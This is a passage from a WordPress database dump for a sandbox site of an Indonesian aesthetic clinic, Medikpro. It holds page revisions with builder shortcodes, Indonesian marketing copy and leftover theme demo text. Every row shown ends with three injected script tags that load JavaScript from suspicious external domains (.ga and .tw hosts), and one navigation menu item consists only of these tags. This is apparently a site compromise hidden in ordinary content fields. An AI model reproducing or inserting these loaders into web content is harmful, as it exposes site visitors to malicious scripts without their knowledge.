type=\'text/javascript\'></script>','What\'s New','','inherit','closed','closed','','32-revision-v1','','','2017-12-14 03:46:30','2017-12-14 03:46:30','',32,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/32-revision-v1/',0,'revision','',0),(6232,1,'2017-12-14 03:47:32','2017-12-14 03:47:32','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','What\'s New','','publish','closed','closed','','whats-new','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6232',99,'nav_menu_item','',0),(6233,1,'2017-12-14 03:52:40','2017-12-14 03:52:40','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Medikpro</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Komitmen kami\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]\r\n<h2>Visi dan Misi</h2>\r\n[/split_line_heading][vc_custom_heading text=\"Visi\r\n\r\nMenjadi klinik aesthetic terkemuka di Indonesia untuk memberikan pengalaman terbaik dalam menangani berbagai permasalahan kulit.\r\n\r\nMisi\r\n\r\nMemberikan layanan perawatan kulit dan tubuh yang didukung dengan teknologi dan inovasi terkini.\r\nMemberikan solusi treatment yang tepat dan aman.\r\nMemberikan pelayanan yang berkualitas, terjamin dan selalu mengutamakan kebutuhan customer.\r\nMemberikan hasil yang memuaskan dan terpercaya.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1513223527064{padding-right: 10% !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Design is the paradise</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">of individuality, eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">abnormality, and humors.</span></h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]We\'re Salient, a creative agency located in the heart of New York city. We pride ourselves on developing unique and professional solutions with a wide variety of mediums. Take a look around and don\'t be shy.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6 style=\"color: #1e83ec;\">What we can help you achieve</h6>\r\n<span style=\"color: rgba(0,0,0,0.45);\">Personal or corporate branding | SEO optimization | Web &amp; UI Design | Standing out in the crowd</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014618584{margin-bottom: 18px !important;}\"]\r\n<h5>Target Audience</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Medium Businesses</span></li>\r\n 	<li><span style=\"color: #999999;\">Freelance Designers</span></li>\r\n 	<li><span style=\"color: #999999;\">College Students</span></li>\r\n 	<li><span style=\"color: #999999;\">Sorta Athletes</span></li>\r\n 	<li><span style=\"color: #999999;\">Dairy Farmers</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014599720{margin-bottom: 18px !important;}\"]\r\n<h5>Our Specialties</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Program Management</span></li>\r\n 	<li><span style=\"color: #999999;\">Graphic &amp; UI Design</span></li>\r\n 	<li><span style=\"color: #999999;\">Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Video Editing</span></li>\r\n 	<li><span style=\"color: #999999;\">Sound Design</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014465975{margin-bottom: 18px !important;}\"]\r\n<h5>Notable Awards</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Top Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Most Liked Company</span></li>\r\n 	<li><span style=\"color: #999999;\">Best In Class 2016</span></li>\r\n 	<li><span style=\"color: #999999;\">Friendliest Group</span></li>\r\n 	<li><span style=\"color: #999999;\">Innovative Brand</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014481555{margin-bottom: 18px !important;}\"]\r\n<h5>Featured On</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">ThemeNectar Show</span></li>\r\n 	<li><span style=\"color: #999999;\">Mr. Nectar\'s Blog</span></li>\r\n 	<li><span style=\"color: #999999;\">Top WP Themes</span></li>\r\n 	<li><span style=\"color: #999999;\">ThemeForest</span></li>\r\n 	<li><span style=\"color: #999999;\">Salient</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-revision-v1','','','2017-12-14 03:52:40','2017-12-14 03:52:40','',19,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/19-revision-v1/',0,'revision','',0),(6234,1,'2017-12-14 03:53:47','2017-12-14 03:53:47','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Medikpro</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Komitmen kami\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]\r\n<h2>Visi dan Misi</h2>\r\n[/split_line_heading][vc_custom_heading text=\"Visi\r\n\r\nMenjadi klinik aesthetic terkemuka di Indonesia untuk memberikan pengalaman terbaik dalam menangani berbagai permasalahan kulit.\r\n\r\nMisi\r\n\r\nMemberikan layanan perawatan kulit dan tubuh yang didukung dengan teknologi dan inovasi terkini.\r\nMemberikan solusi treatment yang tepat dan aman.\r\nMemberikan pelayanan yang berkualitas, terjamin dan selalu mengutamakan kebutuhan customer.\r\nMemberikan hasil yang memuaskan dan terpercaya.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1513223527064{padding-right: 10% !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\">Our Philosophy</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Filosofi dari Medikpro berasal dari kata Medik yang berarti berhubungan dengan pengobatan dan juga pro adalah singkatan dari professional dalam arti mengobati secara professional. Pada bagian atas tulisan Pro, di sebelah kanan terdapat logo daun berwarna biru yang memiliki arti bahwa warna biru merupakan warna tenang dan bersifat professional. Dengan latar belakang yang berwarna putih memberikan kesan steril, bersih dan juga segar.\r\n\r\nDalam hal ini Medikpro memiliki konsep warna yaitu biru dan juga putih yang didukung dengan ruangan yang sebagian besar berwarna putih serta kemasan produk yang digunakan berwarna biru yang melambangkan kesegaran.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-revision-v1','','','2017-12-14 03:53:47','2017-12-14 03:53:47','',19,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/19-revision-v1/',0,'revision','',0),(6235,1,'2017-12-14 04:06:12','2017-12-14 04:06:12','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"news-and-event\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','News & Event','','publish','closed','closed','','news-and-event','','','2017-12-14 04:11:41','2017-12-14 04:11:41','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6235',0,'page','',0),(6236,1,'2017-12-14 04:07:40','2017-12-14 04:07:40','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"promo-of-the-month\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Promo of the Month','','publish','closed','closed','','promo-of-the-month','','','2017-12-14 04:14:01','2017-12-14 04:14:01','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6236',0,'page','',0),(6237,1,'2017-12-14 04:06:12','2017-12-14 04:06:12','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" 